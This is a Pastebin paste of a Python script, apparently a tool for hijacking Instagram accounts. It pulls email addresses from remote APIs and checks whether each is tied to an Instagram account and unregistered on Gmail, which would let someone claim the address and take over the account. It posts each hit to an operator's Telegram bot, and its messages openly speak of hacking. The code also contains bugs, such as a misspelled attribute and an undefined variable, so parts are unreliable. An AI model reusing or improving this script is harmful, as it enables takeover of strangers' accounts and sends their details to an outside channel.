Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import pyfiglet
- import webbrowser
- Ab='\033[1;92m'
- aB='\033[1;91m'
- AB='\033[1;96m'
- aBbs='\033[1;93m'
- AbBs='\033[1;95m'
- A_bSa = '\033[1;31m'
- a_bSa = '\033[1;32m'
- faB_s = '\033[2;32m'
- a_aB_s = '\033[2;39m'
- Ba_bS = '\033[2;36m'
- Ya_Bs = '\033[1;34m'
- S_aBs = '\033[1;33m'
- class Haider:
- def get_email():
- api = "http://tle0.pythonanywhere.com/api/Marko/Generation/email"
- req = requests.get(api).json()
- email = str(req["Gmail"])
- return email
- def Ch_insta(email):
- api = f"http://mrez.pythonanywhere.com/api/Marko/email{email}"
- req = requests.get(api).text
- if str("True") in str(req):
- return True
- else:
- return False
- def Ch_gmail(email):
- api = f"http://markotools.pythonanywhere.com/api/Marko/email{email}"
- req = requests.get(api).txt
- if str("True") in str(req):
- return True
- else:
- return False
- webbrowser.open('https://t.me/lis_5_t')
- h = pyfiglet.figlet_format('HAIDER')
- print(Ab +h)
- token = input (aB +"ENTER TOKEN :")
- id = input (aB +"ENTER ID :")
- webbrowser.open('https://t.me/HAIDERGAMER1')
- while True:
- get_email = Haider.get_email()
- ch_insta = Haider.Ch_insta(get_email)
- if ch_insta == True:
- ch_gmail = Haider.Ch_gmail(get_email)
- if ch_gmail == True:
- print(f" Done : {get_email}"+ Ab)
- text = f"اتفضل هاذا الحساب من اخوك حيدر {get_email} "
- tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=\n {text} \n"
- i = requests.post(tlg)
- else:
- print(f"Not Gamil : {get_gamil}"+ Ab)
- else:
- print(f"No Hack insta : {get_email}"+ Ab)
Advertisement
Add Comment
Please, Sign In to add comment